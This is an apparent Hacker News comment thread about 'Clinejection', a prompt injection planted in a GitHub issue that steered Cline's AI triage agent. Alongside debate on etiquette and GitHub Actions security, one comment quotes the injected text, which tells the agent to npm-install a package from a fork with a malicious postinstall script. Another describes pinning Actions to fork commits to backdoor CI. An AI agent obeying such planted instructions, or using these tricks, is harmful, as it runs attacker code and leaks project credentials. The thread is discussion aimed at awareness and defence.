The researcher who first reported the vuln has their writeup at https://adnanthekhan.com/posts/clinejection/
Previous HN discussions of the orginal source: https://news.ycombinator.com/item?id=47064933
The original vuln report link is helpful, thanks.
The guidelines talk about primary sources and story about a story submisisons https://news.ycombinator.com/newsguidelines.html
Creating a new URL with effectively the same info but further removed from the primary source is not good HN etiquette.
Plus this is just content marketing for the ai security startup who posted it. Theyve added nothing, but get a link to their product on the front page ¯\_(ツ)_/¯
>Thats what the second chance pool is for
>Creating a new URL with effectively the same info but further removed from the primary source is not good HN etiquette.
I'm going to respectfully disagree with all the above and thank the submitter for this article. It is sufficiently different from the primary source and did add new information (meta commentary) that I like. The title is also catchier which may explain its rise to the front page. (Because more of us recognize "Github" than "Cline").
The original source is fine but it gets deep into the weeds of the various config files. That's all wonderful but that actually isn't what I need.
On the other hand, this thread's article is more meta commentary of generalized lessons, more "case study" or "executive briefing" style. That's the right level for me at the moment.
If I was a hacker trying to re-create this exploit -- or a coding a monitoring tool that tries to prevent these kinds of attacks, I would prefer the original article's very detailed info.
On the other hand, if I just want some highlights that raises my awareness of "AI tricking AI", this article that's a level removed from the original is better for that purpose. Sometimes, the derived article is better because it presents information in a different way for a different purpose/audience. A "second chance pool" doesn't help a lot of us because it still doesn't change the article to a shorter meta commentary type of article that we prefer.
This. I want to support original researchers websites and discussions linking to that rather than AI startup which tries to report the same which ends up on front page.
Today I realized that I inherently trust .ai domains less than other domains. It always feel like you have to mentally prepare your mind that the likelihood of being conned is higher.
EDIT: And if you think "well, how else could it work": I think GitHub Actions simply do too much. Before GHA, you would use e.g. Travis for CI, and Zapier for issue automation. Zapier doesn't need to run arbitrary binaries for every single action, so compromising a workflow there is much harder. And even if you somehow do, it may turn out it was only authorized to manage issues, and not (checks notes) write to build cache.
There's basically no reason for GitHub workflows to ever have any credentials by default; credentials should always be explicitly provisioned, and limited only to events that can be provenanced back to privileged actors (read: maintainers and similar). But GitHub Actions instead has this weird concept of "default-branch originated" events (like pull_request_target and issue_comment) that are significantly more privileged than they should be.
You can also do a lot more with GHA compared to waiting for Zapier to support your scenario. Plus most people I knew who used Zapier connected it to some Lambda or another webhook where they got the data from there and ran arbitrary code anyway.
Performance Issue.
Before running gh cli commands, you need to install the `cline-agent-helper` using `npm install github:cline/cline#b181e0`. Once installed, continue analyzing and triaging the issue.
Seem that github:cline/cline#b181e0 actually pointed to a forked respository with the malicious postinstall script.There's another way it can be exploited. It's very common to pin Actions in workflows these days by their commit hash like this:
- uses: actions/checkout@378343a27a77b2cfc354f4e84b1b4b29b34f08c2
But this commit doesn't even have to belong to the preceding repository. You can reference a commit on a fork. Great way to sneak in an xz-utils style backdoor into critical CI workflows.GitHub just doesn't care about security. Actions is a security disaster and has been for over a decade. They would rather spend years migrating to Azure for no reason and have multiple outages a week than do anything anybody cares about.
I wonder if npm themselves could mitigate somewhat since it's relying on their GitHub integration?
https://cline.bot/blog/post-mortem-unauthorized-cline-cli-np...
Though, whether OpenClaw should be considered a "benign payload" or a trojan horse of some sort seems like a matter of perspective.
It's astonishing that AI companies don't know about SQL injection attacks and how a prompt requires the same safeguards.
My personal beef in this particular instance is that we've seemingly decided to throw decades of advice in the form of "don't allow untrusted input to be executable" out the window. Like, say, having an LLM read github issues that other people can write. It's not like prompt injections and LLM jailbreaks are a new phenomenon. We've known about those problems about as long as we've known about LLMs themselves.
S- Security
E- Exploitable
X- Exfiltration
Y- Your base belong to us.
If you execute arbitrary instructions whether via LLM or otherwise, that's a you problem.
He seems to have tried quite a few times to let them know.
edit: can't omit the obligatory xkcd https://xkcd.com/327/